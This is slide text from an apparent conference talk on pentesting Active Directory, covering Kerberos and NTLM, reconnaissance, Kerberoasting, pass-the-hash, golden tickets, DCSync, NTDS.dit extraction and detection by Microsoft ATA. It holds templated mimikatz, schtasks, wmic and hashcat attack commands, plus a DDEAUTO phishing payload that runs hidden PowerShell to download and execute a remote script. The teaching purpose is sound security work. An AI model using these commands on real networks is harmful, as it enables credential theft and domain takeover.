  • 3. ciyinet WHAT ARE WE GOING TO TALK ABOUT? - Introduction to Active Directory - Authentication Protocols - Active Directory Penetration Testing - Reconnaissance - Common Attacks & Techniques - Lateral and Vertical Movements - How-to Avoid Being Caught 3Pentesting Active Directory
  • 4. ciyinet BEAR IN MIND - AD-related techniques - I learn Active Directory from the offensive side - We lower risks and not the other way around - This is going to be intense 4Pentesting Active Directory
  • 5. ciyinet 5 ACTIVE DIRECTORY 101 Pentesting Active Directory
  • 6. ciyinet ACTIVE DIRECTORY 101 • AD is Microsoft’s answer to directory services • Directory service is a hierarchical structure to store objects for quick access and management of all resources 6Pentesting Active Directory
  • 7. ciyinet ACTIVE DIRECTORY 101 • Uses LDAP as its access protocol • Relies on DNS as its locator service, enabling clients to locate domain controllers through DNS queries • AD supports several Naming Conventions • User Principal Names (UPN): • user@domain • LDAP names (Distinguished Names): • cn=common name • ou=organizational unit • dc=domain • for eg. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON 7Pentesting Active Directory
  • 9. ciyinet ACTIVE DIRECTORY 101 Just a Database: NTDS.dit 9Pentesting Active Directory
  • 10. ciyinet ACTIVE DIRECTORY 101 Domain Controllers and Domain Admins 10Pentesting Active Directory
  • 11. ciyinet CREDENTIALS FLOW IN WINDOWS 11Pentesting Active Directory
  • 12. ciyinet 12 NTLM SCHEME Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
  • 13. ciyinet 13 KERBEROS SCHEME Pentesting Active Directory Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
  • 14. ciyinet 14 KERBEROS SCHEME Pentesting Active Directory 1. Client encrypts a timestamp with his/her hash/key 2. Client receives a TGT signed with the domain krbtgt account that proves they are who they say they are 3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain. 4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN) Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
  • 15. PENTESTING ACTIVE DIRECTORY Sure, but how about actually pentesting it?
  • 16. ciyinet ACTIVE DIRECTORY PENETRATION TESTING The Goal 16Pentesting Active Directory
  • 17. ciyinet ACTIVE DIRECTORY PENETRATION TESTING The Goal 17Pentesting Active Directory • Domain admins • Enterprise admins • Built-in administrators • Account Operators • Allowed RODC Password Replication Group • Backup Operators • DnsAdmins • …
  • 18. ciyinet ACTIVE DIRECTORY PENETRATION TESTING The real Goal! 18Pentesting Active Directory
  • 19. ciyinet ACTIVE DIRECTORY PENETRATION TESTING The real Goal! WMIC 19Pentesting Active Directory
  • 20. ciyinet 20 ATTACK KILL CHAIN Reference: Microsoft Advanced Threat Analytics Pentesting Active Directory
  • 21. ciyinet 21 ATTACK KILL CHAIN Pentesting Active Directory
  • 22. ciyinet 22 ATTACK KILL CHAIN Pentesting Active Directory
  • 27. ciyinet 27 PHISHING + DDEAUTO = RCE • Dynamic Data Exchange (DDE): protocol for transferring data between applications • Valid for MS Excel, MS Word… and MS Outlook • Recently used as macro-less Malware DDEAUTO "C:ProgramsMicrosoftOffice365Outlook........windowssystem 32WindowsPowerShellv1.0powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire- test.ps1');powershell -e $e # " "Beneficios Qurtuba" Pentesting Active Directory
  • 29. ciyinet 29 NEXT STEPS • Persistence (userland) • Recoinaissance • Privilege escalation • PowerSploit PowerUp • Bypass UAC • … • Persistence (admin) • Lateral and vertical movements • Grab and exfiltrate trophies Pentesting Active Directory
  • 31. ciyinet LOCAL RECONNAISSANCE Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting Command Description ipconfig /all Displays the IP address, subnet mask, and default gateway for all adapters. Also info about DHCP and DNS settings whoami /all Displays all information in the current access token, including the current user name, security identifiers (SID), privileges, and groups that the current user belongs to net localgroup Displays the name of the server and the names of local groups on the computer. net localgroup “administrators” Displays local administrators netstat -an Displays active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table tasklist /V Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer 31Pentesting Active Directory
  • 32. ciyinet LOCAL RECONNAISSANCE Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting Command Description net start Lists started Windows services sc qc <SERVICE> Gets the parameters for an individual service accesschk.exe -ucqv <SERVICE> Determine service access control rules (accesschk.exe is part of Microsoft Sysinternals suite) systeminfo > info_output.txt Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties, such as RAM, disk space, and network cards schtasks /query /fo LIST /v list of scheduled tasks: whether they are recurring, where the task can be found and its parameters, as well as, crucially, what permissions they are run with dir, type, findstr Browse and search for information in the local file system. 32Pentesting Active Directory
  • 33. ciyinet NETWORK RECONNAISSANCE Command Description ping ☺ echo %USERDOMAIN% Domain name which the host is joined to echo %logonserver% Obtains the name of the Domain Controller the host used to authenticate toset logonserver net group /domain Lists existing groups in the domain net group <GROUP NAME>/domain Lists members of a group. I.e: “domain computers”, “domain controllers”, “domain admins” net localgroup administrators /domain Gets members of the built-in group “Administrators” Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting 33Pentesting Active Directory
  • 34. ciyinet NETWORK RECONNAISSANCE Command Description net user /domain Lists all users within the domaindominio actual net user <ACCOUNT NAME> /domain Obtains detailed information about a user given his username net view Displays a list of domains, computers, or resources that are being shared by the specified computer. Used without parameters, net view displays a list of computers in your current domain net use Access to shared resources net accounts /domain Obtains the domain password policy nltest /domain_trusts Maps trust relationships Collect information of the network, process and OS in order to investigate what kind of machine we succeeded in infecting 34Pentesting Active Directory
  • 37. ciyinet 37 COMMON ATTACKS & TECHNIQUES • Passwords in SYSVOL & Group Policy Preferences – 10% • Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5% • Kerberos TGS Service Ticket Cracking (Kerberoast) – 20% • SMB Shares Mining – 75% • Credential Theft Shuffle (“Mimikatz dance”) – 60% Reference: https://adsecurity.org/?p=2362 Pentesting Active Directory
  • 38. ciyinet 38 COMMON ATTACKS & TECHNIQUES • Passwords in SYSVOL & Group Policy Preferences – 10% • Missing Patches; Exploit the MS14-068 on a DC Missing the Patch – 5% • Kerberos TGS Service Ticket Cracking (Kerberoast) – 20% • SMB Shares Mining – 75% • Credential Theft Shuffle (“Mimikatz dance”) – 60% Reference: https://adsecurity.org/?p=2362 Pentesting Active Directory
  • 39. ciyinet 39 KERBEROAST Pentesting Active Directory 1. Client encrypts a timestamp with his/her hash/key 2. Client receives a TGT signed with the domain krbtgt account that proves they are who they say they are 3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain. 4. DC sends a TGS ticket encrypted using the hash of the account that is associated with that service (SPN) Attacker
  • 40. ciyinet 40 KERBEROAST • Offline brute force of password of service account within service tickets (TGS) • No risk of detection • No account lockouts • Invoke-Kerberoast from PowerView (dev) to collect hashes • Focus on user accounts. They have shorter passwords • JohnTheRipper (magnumripper) to crack them References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/magnumripper/JohnTheRipper Pentesting Active Directory
  • 41. ciyinet 41 SMB SHARES MINING • Usually very fruitful, but sometimes boring and time consuming • Enumerating shares in the environment and looking for data with hardcoded creds (scripts, config files), backups, documentation… PowerView Find-ShareDomain • Searches for computer shares on the domain. If -CheckShareAccess is passed, then only shares the current user has read access to are returned. smbmap • Intended to simplify searching for potentially sensitive data across large networks. • Enumerates samba share drives across an entire domain. List drives, permissions, contents, upload/download functionality, file name auto-download pattern matching, etc. Reference: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/ShawnDEvans/smbmap Pentesting Active Directory
  • 42. ciyinetTitulo de la Ponencia 42
  • 43. ciyinet 43 CREDENTIAL THEFT SHUFFLE • Escalating privileges on some machine • Extracting creds/hashes from memory • Derivative administrator • User hunting: moving laterally and repeating the attack till Domain Admin level is reached References: https://github.com/gentilkiwi/mimikatz Pentesting Active Directory “Mimikatz dance”
  • 45. ciyinet 45 USER HUNTING List local admins remotely • Get-localadmin (Script) • Get-NetLocalGroup (PowerView) List active sessions remotely • PsLoggedon (Sysinternals) • Get-NetLoggedon (PowerView) • Get-NetSession (PowerView) • Tasklist References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://docs.microsoft.com/en-us/sysinternals/ https://gitlab.com/ciyinet/ciyinotes/blob/master/Microsoft%20Windows/readme.md Pentesting Active Directory
  • 47. ciyinet 47 USER HUNTING • Invoke-UserHunter (PowerView) • BloodHound 1. Gets groups and group members of each group 2. Lists domain computers 3. Obtains local admins for each computer 4. Lists active sessions on each computer References: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 https://github.com/BloodHoundAD/BloodHound Pentesting Active Directory
  • 49. Creds dump + Privs escalation
  • 51. ciyinet 51 PASS-THE-HASH Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
  • 52. ciyinet 52 PASS-THE-HASH Pentesting Active Directory Protocol Algorithm Secret to use LM DES-ECB Hash LM NTLMv1 DES-ECB Hash NT NTLMv2 HMAC-MD5 Hash NT
  • 53. ciyinet 53 OVERPASS-THE-HASH (PASS-THE-KEY) Kerberos Kerberos References: http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash Pentesting Active Directory Protocol Secret to use Kerberos RC4 = Hash NT AES128 key AES256 key
  • 54. ciyinet 54 (OVER)PASS-THE-HASH Pentesting Active Directory mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /run:PROGRAM"
  • 55. Titulo de la Ponencia 55
  • 56. ciyinetPentesting Active Directory 56 PASS-THE-TICKET • Inject Kerberos tickets • Tickets must be in Kerberos credential format (KRB_CRED) - http://tools.ietf.org/html/rfc4120#section-5.8 • Kerberos module does not require any privilege. It uses official Microsoft Kerberos API mimikatz.exe "kerberos::ptt FILENAME"
  • 57. ciyinet 57 GOLDEN TICKET Encrypted with KRBTGT hash Attacker TGT: • Username • Groups membership • … krbtgt:hash Pentesting Active Directory
  • 58. ciyinet 58 GOLDEN TICKET KRBTGT hash can be used to generate arbitrary TGT: • Made by the attacker, not KDC • Anything can be pushed inside mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt" Pentesting Active Directory
  • 60. ciyinet 60 DCSYNC • It “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller • Replicates the user credentials via GetNCChanges (Directory Replication Service (DRS) Remote Protocol) • Special rights are required to run DCSync mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit mimikatz.exe "lsadump::dcsync /all /csv" exit Pentesting Active Directory
  • 62. ciyinetPentesting Active Directory 62 DCSHADOW Register new domain controllers to inject malicious AD objects and so create backdoors or any kind of illegitimate access or right Reference: https://blog.alsid.eu/dcshadow-explained-4510f52fc19d Hi guys! This is DCShadow!
  • 63. PENTESTING ACTIVE DIRECTORY dir is boring, show me how to RCE
  • 64. ciyinetPentesting Active Directory 64 REMOTE CODE EXECUTION AT Schtasks SC at TARGET_HOST HH:MM EXECUTABLE schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S TARGET_HOST /RU System schtasks /run /tn TASK_NAME /S TARGET_HOST sc TARGET_HOST create SERVICE_NAME binpath= “EXECUTABLE” sc TARGET_HOST start SERVICE_NAME
  • 65. ciyinetPentesting Active Directory 65 REMOTE CODE EXECUTION WMIC WinRM PsExec wmic /node:TARGET_HOST process call create “EXECUTABLE” Invoke-Command –ComputerName TARGET_HOST –ScriptBlock { COMMAND(S) } PsExec.exe TARGET_HOST –u USER PROCESS
  • 68. ciyinet NTDS.DIT How-to get hashes from it: 1. Decrypt Password Encryption Key (PEK). PEK is encrypted using bootkey 2. Hashes decryption first round with PEK using RC4 3. Hashes decryption second round with DES 68Pentesting Active Directory
  • 69. ciyinet 69 GRAB NTDS.DIT AND SYSTEM Volume Shadow Copy Ntdsutil Invoke-NinjaCopy Invoke-NinjaCopy –Path “C:WindowsNTDSntds.dit” –LocalDestination “C:ntds.dit” Invoke-NinjaCopy –Path “C:WindowsSystem32configSYSTEM” –LocalDestination “C:SYSTEM” ntdsutil "ac i ntds" "ifm" "create full c:copy-ntds" quit quit vssadmin create shadow /for=C: Pentesting Active Directory
  • 70. ciyinetTitulo de la Ponencia 70
  • 71. ciyinetTitulo de la Ponencia 71
  • 72. ciyinet John the Ripper Hashcat & Rockyou wordlist 72 CRACKING NT HASHES john FILE_HASHES --format=NT hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt --potfile-path OUTPUT_NT.pot Pentesting Active Directory
  • 75. PENTESTING ACTIVE DIRECTORY But how about the blue team? Microsoft ATA
  • 77. ciyinet 77 PASS-THE-HASH Pentesting Active Directory • Based on local Security events • Not capture by ATA by default • Force NTLM to be used • Overpass-the-hash: Encryption downgrade is detected mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
  • 78. ciyinet 78 PASS-THE-HASH Pentesting Active Directory • Based on local Security events • Not capture by ATA by default • Force NTLM to be used • Overpass-the-hash: Encryption downgrade is detected mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM " exit
  • 80. ciyinet 80 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
  • 81. ciyinet 81 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
  • 82. ciyinet 82 GOLDEN TICKET • Same as overpass-the-hash • Detection based on lifetime • Default ticket lifetime in AD is 10 hours mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt" Pentesting Active Directory
  • 83. ciyinet 83 DCSYNC DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected Pentesting Active Directory
  • 84. ciyinet 84 DCSYNC DRS traffic (DSGetNCChanges) from a non-DC to a DC system can be detected Microsoft ATA Attacker Pentesting Active Directory
  • 86. ciyinet 86 • Plaintext creds • WDigest • SMB Mining • mimikittenz • LaZagne • WCMDump • Hash • Memory dump • … Pentesting Active Directory
  • 87. ciyinet 87 • Run as • NTLM Relay • Pass-the-hash • Pass-the-ticket • Golden ticket Logon session User SID Group SIDs Logon SID Others … Access token Pentesting Active Directory
  • 88. ciyinet 88 • PsExec • WinRM • AT • Schtasks • WMIC • SC Pentesting Active Directory
  • 89. ciyinet 89 • DCSync • DCShadow • Golden ticket • SMB Mining Pentesting Active Directory
  • 90. ciyinet 90 • DCSync • DCShadow • Golden ticket • SMB Mining Pentesting Active Directory
  • 91. ciyinet 91 • NTDS.dit • Volume Shadow Copy • Ntdsutil • Invoke-NinjaCopy • Persistence • Golden ticket • Skeleton key • ACL-based backdoors • Malicious SSP • Password filters • …. • DSInternals • Impacket Secretsdump Pentesting Active Directory • Crack hashes
  • 92. ciyinet 92 • NTDS.dit • Volume Shadow Copy • Ntdsutil • Invoke-NinjaCopy • Persistence • Golden ticket • Skeleton key • ACL-based backdoors • Malicious SSP • Password filters • …. • DSInternals • Impacket Secretsdump Pentesting Active Directory • Crack hashes
  • 93. ciyinet 93 BUSINESS RISK Compromise of just one Domain Admin account in the Active Directory exposes the entire organization to risk. The attacker would have unrestricted access to all resources managed by the domain, all users, servers, workstations and data. Moreover, the attacker could instantly establish persistence in the Active Directory environment, which is difficult to notice and cannot be efficiently remediated with guarantees. “Once domain admin, always domain admin” Pentesting Active Directory
  • 94. ciyinet 94 ACKNOWLEDGMENT & REFERENCES • Miroslav Sotak and TVM team • FWHIBBIT • RootedCON and any other Sec Community in Spain Pentesting Active Directory
  • 95. ciyinetPentesting Active Directory 95 PENTESTING ACTIVE DIRECTORY